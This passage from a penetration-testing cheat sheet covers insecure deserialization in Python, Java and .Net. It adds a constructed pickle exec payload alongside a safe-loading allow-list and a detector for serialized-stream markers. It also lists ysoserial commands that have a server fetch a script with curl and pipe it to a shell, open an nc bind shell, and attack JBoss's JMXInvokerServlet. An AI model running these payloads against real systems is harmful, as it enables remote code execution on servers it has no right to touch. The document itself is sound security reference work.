unserialize()
```
## Python
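Worked example for the Python sinks listed in this section (pickle `loads`, and by extension any loader that resolves arbitrary globals). This is added illustration, not code from the original cheat sheet: a constructed object whose `__reduce__` makes `pickle.loads` call `exec()`, a static scan of the pickle's GLOBAL/STACK_GLOBAL opcodes that reveals the import without running it, and a restricted `Unpickler` that refuses anything outside an allow-list. The allow-list contents and the environment-variable marker are assumptions made for the demo.

```python
import io
import os
import pickle
import pickletools


class Evil:
    """Constructed attacker object: loading its pickle calls exec() on our code."""

    def __init__(self, code):
        self.code = code

    def __reduce__(self):
        # pickle stores (callable, args) and calls callable(*args) at load time;
        # any importable callable works, exec is just the most direct.
        return (exec, (self.code,))


def build_payload(code):
    return pickle.dumps(Evil(code))


def benign_payload():
    # Constructed "normal" application data for comparison.
    return pickle.dumps({"user": "bob", "roles": ["admin"]})


def vulnerable_load(data):
    # The sink from the list above: pickle.loads on untrusted bytes.
    return pickle.loads(data)


def referenced_globals(data):
    """List the (module, name) pairs a pickle will import, without running it.

    GLOBAL/INST carry "module name" as their argument; STACK_GLOBAL (protocol
    4+) pops the two most recently pushed strings. Tracking only the last two
    string pushes is an approximation; it is exact for simple payloads.
    """
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            refs.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return refs


# Hardened variant: an Unpickler that resolves only an explicit allow-list of
# globals. The allow-list below is an assumption made for this example.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(data):
    """Return (True, object) or (False, reason); never calls attacker callables."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


def marker_set():
    # Side effect the constructed payload leaves behind once vulnerable_load ran it
    # (environment variable name is an assumption for this demo).
    return os.environ.get("PWNED_BY_PICKLE") == "1"


if __name__ == "__main__":
    payload = build_payload("import os; os.environ['PWNED_BY_PICKLE'] = '1'")
    print("imports:", referenced_globals(payload))      # [('builtins', 'exec')]
    print("restricted:", safe_load(payload))            # (False, 'forbidden global builtins.exec')
    vulnerable_load(payload)
    print("marker set by pickle.loads:", marker_set())  # True
```

`referenced_globals` is the check to run on a captured blob before deciding whether it is worth a full review: any `builtins`, `os`, `subprocess` or `posix` reference in application data is a finding in itself. `yaml.load` without `Loader=yaml.SafeLoader` and `jsonpickle.decode` have the same shape of problem (a type name in the input chooses the callable), so the same allow-list approach applies to them.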
pickle/c_pickle/_pickle with load/loads
PyYAML with load (yaml.load without Loader=SafeLoader, yaml.unsafe_load)
jsonpickle with decode (encode/store calls only show the format is in use; the sink is decode)
## Java
### Whitebox
XMLDecoder fed externally supplied (user-controlled) input
XStream with fromXML method (XStream <= 1.4.6 is vulnerable out of the box; newer versions still need the security framework / type allow-list configured)
ObjectInputStream with readObject
Uses of readObject, readObjectNoData, readResolve or readExternal
ObjectInputStream.readUnshared
Serializable
### Blackbox
AC ED 00 05 in Hex
rO0 in Base64
Content-type: application/x-java-serialized-object
### ysoserial
```
java -jar ysoserial.jar CommonsCollections4 'command'
```
## .Net
TypeNameHandling (Json.Net setting other than None)
JavaScriptTypeResolver (JavaScriptSerializer)
AAEAAAD///// (Base64 of the BinaryFormatter header 00 01 00 00 00 FF FF FF FF)
TypeObject
$type (type discriminator in Json.Net output)
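Detection helper for the Java blackbox indicators and the .Net markers above, added here as an example rather than taken from the original page. It checks the Content-Type header, then looks for the Java stream magic (AC ED 00 05 / rO0) and the BinaryFormatter header (AAEAAAD/////) in raw, Base64 and hex form, and flags `$type` keys in JSON bodies. For Java streams it also reads the first class name straight from the stream header (TC_OBJECT, TC_CLASSDESC, length-prefixed name) without deserializing anything. The sample bodies are constructed, not captured traffic; the Java sample is only a stream prefix with a dummy serialVersionUID.

```python
import base64
import binascii
import re
import struct

JAVA_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC 0xACED + STREAM_VERSION 5, "rO0AB" in Base64
DOTNET_BF_MAGIC = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"  # BinaryFormatter header, "AAEAAAD/////"


def decode_layers(blob):
    """Yield (layer, bytes) for the encodings a parameter is commonly wrapped in."""
    yield "raw", blob
    compact = re.sub(rb"\s+", b"", blob)
    try:
        yield "base64", base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        pass
    try:
        yield "hex", binascii.unhexlify(compact)
    except (binascii.Error, ValueError):
        pass


def first_java_class(stream):
    """Name of the first serialized class, read from the stream header only:
    TC_OBJECT (0x73), TC_CLASSDESC (0x72), 2-byte length, modified-UTF-8 name.
    Nothing is deserialized, so this is safe on hostile input."""
    if len(stream) < 8 or not stream.startswith(JAVA_MAGIC) or stream[4:6] != b"\x73\x72":
        return None
    (length,) = struct.unpack(">H", stream[6:8])
    return stream[8:8 + length].decode("utf-8", "replace")


def fingerprint(body, headers=None):
    """Findings for one request body or parameter value: header check, then each layer."""
    headers = {k.lower(): v for k, v in (headers or {}).items()}
    findings = []
    if "application/x-java-serialized-object" in headers.get("content-type", ""):
        findings.append("content-type: java serialized object")
    for layer, data in decode_layers(body):
        if data.startswith(JAVA_MAGIC):
            cls = first_java_class(data)
            findings.append(f"{layer}: java stream" + (f" (first class {cls})" if cls else ""))
        elif data.startswith(DOTNET_BF_MAGIC):
            findings.append(f"{layer}: .net binaryformatter stream")
        elif layer == "raw" and re.search(rb'"\$type"\s*:', data):
            findings.append("raw: json with $type (json.net typenamehandling)")
    return findings


# Constructed samples (not captured traffic). The Java bytes are only a stream
# prefix: header, TC_OBJECT, TC_CLASSDESC, class name, dummy serialVersionUID.
SAMPLE_JAVA = (JAVA_MAGIC + b"\x73\x72" + struct.pack(">H", 17) + b"java.util.HashMap"
               + b"\x00" * 8 + b"\x02\x00\x00")
SAMPLE_DOTNET = DOTNET_BF_MAGIC + b"\x01\x00\x00\x00" + b"\x00\x00\x00\x00"
SAMPLES = {
    "raw body": (SAMPLE_JAVA, {"Content-Type": "application/x-java-serialized-object"}),
    "base64 cookie": (base64.b64encode(SAMPLE_JAVA), {}),
    "hex parameter": (binascii.hexlify(SAMPLE_JAVA), {}),
    "base64 .net blob": (base64.b64encode(SAMPLE_DOTNET), {}),
    "json.net body": (b'{"$type":"SomeNamespace.SomeType, SomeAssembly","Name":"x"}', {}),
    "plain form field": (b"user=bob&role=admin", {}),
}


def scan_samples():
    return {name: fingerprint(body, hdrs) for name, (body, hdrs) in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:18} {findings}")
```

The first class name is the useful extra: `java.util.HashMap` or an application DTO is expected traffic, while a gadget-chain entry point shows up just as plainly at the same offset. Gzip-wrapped and URL-safe Base64 variants are common in practice and would need one more layer in `decode_layers`.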
## Java Deserialization
[Java Deserialization Cheat Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet)
[How to get a full shell through Java Runtime.exec](http://codewhitesec.blogspot.de/2015/03/sh-or-getting-shell-environment-from.html)
Ysoserial payload to execute full commands. Runtime.exec splits the command string on whitespace and runs it without a shell, so pipes and redirections are passed as literal arguments; the `sh -c $@|sh .` prefix turns the remaining tokens back into a real shell command line:
```
sh -c $@|sh . <payload here>
```
Generate a ysoserial payload that makes the server download further commands via curl and pipe them to a shell:
```
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'sh -c $@|sh . curl http://10.42.65.40/commands.sh |sh' > jenkins_curl_shell.bin
```
Generate a ysoserial payload that starts an nc bind shell:
```
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'sh -c $@|sh . nc -lp 8088 -e /bin/bash' > nc-jenkins.out
```
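Why the `sh -c $@|sh .` prefix is needed, shown as an added example (not from the original page or the linked post): the first function splits a command string the way `Runtime.exec(String)` does, the second runs that argv without a shell, and `wrap_for_shell` builds the prefix form from the codewhitesec post. It assumes a POSIX `sh`, `echo` and `tr` on the host running the example.

```python
import subprocess


def java_exec_argv(command):
    """Split the way java.lang.Runtime.exec(String) does: a StringTokenizer on
    whitespace. There is no shell, so quotes, pipes and redirections become
    ordinary argv entries handed to the first token's program."""
    return command.split()


def run_as_java_would(command, timeout=10):
    """Execute the argv Runtime.exec would build (assumes POSIX sh/echo/tr)."""
    proc = subprocess.run(java_exec_argv(command), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout.strip()


def wrap_for_shell(shell_command):
    """The 'sh -c $@|sh' trick from the linked codewhitesec post.

    Token 3, '$@|sh', contains no whitespace so it survives as the script for
    sh -c; '.' becomes $0 and every later token a positional parameter. Inside
    the script $@ reassembles them, echo prints that line, and the inner sh
    parses it as a real command line, pipes and all.
    """
    return "sh -c $@|sh . echo " + shell_command


if __name__ == "__main__":
    print(java_exec_argv("sh -c $@|sh . echo id"))
    print(run_as_java_would("echo hello | tr a-z A-Z"))                  # hello | tr a-z A-Z
    print(run_as_java_would(wrap_for_shell("echo hello | tr a-z A-Z")))  # HELLO
```

The page's payloads leave out `echo`: there `$@` runs `curl ... |sh` directly, with the trailing `|sh` reaching curl as a literal argument, and it is the outer `|sh` in the script that pipes curl's output into a shell. That works for commands whose output is the script to run; the `echo` form is the general one.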
### JMXInvokerServlet
```
java -jar ysoserial-master-v0.0.4-gad26e2b-61.jar CommonsCollections5 "touch /tmp/pwned" > payload.txt
```
Generate the payload with ysoserial and send it as the request body with Burp. The server answers with a jboss.invocation.InvocationException whether or not the gadget chain executed, so check for the side effect (here, /tmp/pwned) rather than the response.
Ensure the headers match these (Content-Length must equal the actual payload size):
```
POST /invoker/JMXInvokerServlet HTTP/1.1
Host: <hostname/IP>:8080
Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue
Content-Length: 2083
```
# TOOLS
### Java
- Ysoserial: https://github.com/frohoff/ysoserial
`java -jar ysoserial.jar CommonsCollections4 'command'`
- Java Deserialization Scanner (Burp extension): https://github.com/federicodotta/Java-Deserialization-Scanner
- SerialKiller (defensive look-ahead ObjectInputStream with class allow/deny lists): https://github.com/ikkisoft/SerialKiller
- Serianalyzer (static gadget-chain analysis): https://github.com/mbechler/serianalyzer
- Java Unmarshaller Security (paper plus payload generators for XStream, Jackson, etc.): https://github.com/mbechler/marshalsec
- Java Serial Killer (Burp extension): https://github.com/NetSPI/JavaSerialKiller
- Android Java Deserialization Vulnerability Tester: https://github.com/modzero/modjoda
### .NET
- Ysoserial.net: https://github.com/pwntester/ysoserial.net
`ysoserial.exe -g ObjectDataProvider -f Json.Net -c "command-here" -o base64`
### Burp-Plugins
- Java: https://github.com/DirectDefense/SuperSerial
- Java: https://github.com/DirectDefense/SuperSerial-Active
- Burp-ysoserial: https://github.com/summitt/burp-ysoserial